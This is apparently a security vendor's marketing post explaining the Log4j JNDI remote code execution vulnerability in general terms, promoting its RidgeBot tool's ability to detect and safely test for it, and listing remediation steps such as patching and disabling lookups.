On November 24, 2021, Apache was notified about the Log4j remote code execution vulnerability by the Alibaba Cloud Security team. The vulnerability in the Apache Log4j Library has the potential for a wide-scale impact, which is actively being exploited in the wild.
Log4j is a common logging library used across most Java applications, including business systems that record log information. This vulnerability is a trivial exploit, meaning it can be very easy to perform, and allows remote code execution and control of log messages to load and execute malicious code into the environment.
Understanding the vulnerability.
Logging frameworks are typically considered purely as data, however, Log4j 2.0 includes “lookups” that include Java Naming and Directory Interface (JNDI) lookups, which were not restricted and therefore led to the vulnerability. JNDI is an API for directory services that allow administrators to interface with LDAP or DNS to look up data and other resources. If bad actors – even those not so sophisticated hackers – load an untrusted Java class, the victim servers can potentially execute unauthorized code.
How RidgeBot can help.
To prevent RCE from breaching the network, Ridge Security has added the capabilities for detecting and exploiting the Apache Log4j vulnerability since RidgeBot 3.8.
Using RidgeBot, you can safely test whether your website server is vulnerable and whether your environment allows it to be exploited. Even though you may have patched your systems, we recommend testing the patch and ensuring that it works properly in your environment. With this vulnerability testing in place, you can stay one step ahead of the hackers.
These snapthots give you a view into what RidgeBot 3.8 vulnerability testing delivers to security admins:
Figure 1. Apache Log4j-2 RCE Vulnerability Found
Figure 2. Proof of a Successful Exploit – Compromised Web Shell
Figure 3. Attack Path Visualization
What you can do.
- First and foremost, understand the vulnerability and the risk to your environment.
- Download the patch, which is currently available and the strongest action Security teams can take to remove the risk from remote code execution.
- Optionally, review the version of Log4j installed on Apache servers and if needed, disable the lookup functionality to remote servers.
- Contact Ridge Security for a validation test.